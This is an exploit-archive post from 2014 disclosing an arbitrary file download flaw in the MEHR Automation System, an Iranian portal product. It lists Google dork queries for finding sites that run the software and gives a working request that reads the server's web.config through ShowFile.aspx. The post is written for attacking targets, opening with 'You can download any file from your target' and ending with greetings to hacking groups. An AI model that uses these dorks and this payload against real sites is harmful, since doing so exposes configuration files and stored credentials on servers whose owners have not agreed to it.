Home / exploits MEHR Automation System Arbitrary File Download
Posted on 26 August 2014
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : MEHR Automation System Arbitrary File Download Vulnerability(persian portal) # Author : alieye # vendor : http://shakhesrayane.ir/ # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # # Google Dork: # intext:"Poshtibani@ShakhesRayane.ir" # intext:"Shakhes Rayane Sepahan" # www.google.com/search?q=%22%D8%B3%DB%8C%D8%B3%D8%AA%D9%85+%D8%A7%D8%AA%D9%88%D9%85%D8%A7%D8%B3%DB%8C%D9%88%D9%86+%D8%A7%D8%AF%D8%A7%D8%B1%DB%8C+%D9%85%D9%87%D8%B1+%D8%AF%D8%A7%D9%86%D8%B4%22 # # Version: all version # Date: 25/08/2014 # os : windows server 2008 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ You can download any file from your target ;) Exploit : http://victim.com/ShowFile.aspx?File=~/web.config #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
